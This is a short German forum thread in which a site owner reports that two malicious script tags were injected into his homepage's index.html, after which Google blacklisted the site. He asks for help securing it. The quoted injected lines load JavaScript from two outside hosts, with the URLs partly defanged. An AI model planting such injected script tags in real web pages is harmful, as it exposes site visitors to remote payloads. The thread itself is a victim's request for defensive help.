Gefährliche Malware eingeschleust

Diskutiere Gefährliche Malware eingeschleust im Security-Zone - Sicherheitslücken, Virenschutz Forum im Bereich Hardware & Software Forum; Kaum sind die Spam-Bot Attacken auf PF einigermaßen wieder in Griff, wird meine HP zugemüllt. Wie? keine Ahnung. Jedenfalls steht in der...
  • Gefährliche Malware eingeschleust Beitrag #1
femi

femi

Super-Moderator
Teammitglied
Dabei seit
08.12.1998
Beiträge
6.886
Reaktionspunkte
3
Kaum sind die Spam-Bot Attacken auf PF einigermaßen wieder in Griff, wird meine HP zugemüllt. Wie? keine Ahnung. Jedenfalls steht in der index.html dann so ein Müll drinnen: ** --1eaf92 ** ** script type= text/javascript src= h**p://www.cartellinapoletani.com/chatme/traf.php?id=15291064 script ** ** 1eaf92 ** ** --7c1624 ** ** script type= text/javascript src= h**p://lifephotoblogs.com/wp-admin/clicker.php?id=15291066 script ** ** 7c1624 ** Die ursprüngliche Datei ist aber größer als jene die übrig bleibt, wenn ich den Müll rauslösche. Mit dem Spam sind sie aber nicht gleich groß. Binnen einen Tag stand die Seite auf der Blacklist bei Google. Als ersten Schritt habe ich mal das ftp-Paßwort geändert. Sonst noch Tipps? Gruß femi
 
Zuletzt bearbeitet:
  • Gefährliche Malware eingeschleust Beitrag #2
fox99

fox99

Bekanntes Mitglied
Dabei seit
27.11.1999
Beiträge
3.948
Reaktionspunkte
27
Ort
Omicron Persei 8
irgendwelche php-skripte die auf dem server laufen?
blogs, foren, gästebücher, ...
 
  • Gefährliche Malware eingeschleust Beitrag #3
femi

femi

Super-Moderator
Teammitglied
Dabei seit
08.12.1998
Beiträge
6.886
Reaktionspunkte
3
Nichts dergleichen, Laufband in Java-script mit den aktuellen Wetterdaten aber nicht von fremden Quellen. Der Server gehört lima-city. Was die anderen user da laufen haben kann ich natürlich nicht sagen.
 
Thema:

Gefährliche Malware eingeschleust

ANGEBOTE & SPONSOREN

https://www.mofapower.de/

Statistik des Forums

Themen
213.179
Beiträge
1.579.171
Mitglieder
55.876
Neuestes Mitglied
RamiroGarn
Oben